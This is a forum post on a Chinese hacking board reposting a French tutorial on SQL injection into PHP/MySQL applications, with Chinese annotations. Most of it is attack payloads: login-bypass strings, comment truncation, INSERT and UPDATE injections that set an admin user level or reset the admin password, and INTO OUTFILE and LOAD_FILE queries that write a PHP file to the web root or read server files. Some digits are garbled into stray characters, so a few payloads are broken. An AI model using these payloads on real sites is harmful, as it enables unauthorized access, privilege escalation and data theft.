[转载]L'injection (My)SQL via PHP

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6828
精华: 834
积分: 36067
阅读权限: 255
性别: 男
来自: 中国
在线时间: 597 小时
注册时间: 2004-6-25
最后登录: 2008-11-18

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-7-24 05:40 只看该作者

[转载]L'injection (My)SQL via PHP

文章作者：小夜

PHP注入.精简版本.小夜整理.有些地方我加了注释.
文章比较细致.主要介绍了三种SQL句子的注入方法.

1- SELECT
2- INSERT
3- UPDATE

$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"

où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :

<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT uid FROM admins WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.

SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'

SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'

SELECT * FROM table WHERE nom='Jack'# commentaire

SELECT * FROM table WHERE nom='Jack'

SELECT * FROM table WHERE /* commentaires */ addresse=ཕ rue des roubys'

SELECT * FROM table WHERE addresse=ཕ rue des roubys'

SELECT uid FROM admins WHERE login='John'#' AND password=''

SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

$req = "SELECT password FROM admins WHERE login='$login'"

SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.

SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .

$req = "SELECT uid FROM membres WHERE login='$login' AND password='$pass'"

SELECT * FROM table WHERE msg LIKE '%hop'

SELECT * FROM table WHERE msg LIKE 'hop%'

SELECT * FROM table WHERE msg LIKE '%hop%'

SELECT * FROM table WHERE msg LIKE 'h%p'

SELECT * FROM table WHERE msg LIKE 'h_p'

SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''

SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''

$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY name"

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT email, website FROM membres WHERE name LIKE '%$search%' ORDER BY $orderby"

以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看

INSERT :

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')"

INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)

$query2 = "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"

INSERT INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''

CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$query3 = "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')"

INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',Ɖ')#',Ƈ')

可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续

UPDATE的利用

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$sql = "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"

UPDATE membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' WHERE id='[ID]'

UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'

UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'

UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'

CREATE TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)

$sql = "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"

UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews=཈'

la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')

UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews=཈'
SELECT CONV("abc",16,3), CONV("abc",16,8).

DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )

UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews=཈'

一句话.当常规注入失败的时候.要想到灵活运用函数看看. OK.完毕..

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]L'injection (My)SQL via PHP

[转载]L&#39;injection (My)SQL via PHP

[转载]L&#39;injection (My)SQL via PHP

[转载]L'injection (My)SQL via PHP

[转载]L'injection (My)SQL via PHP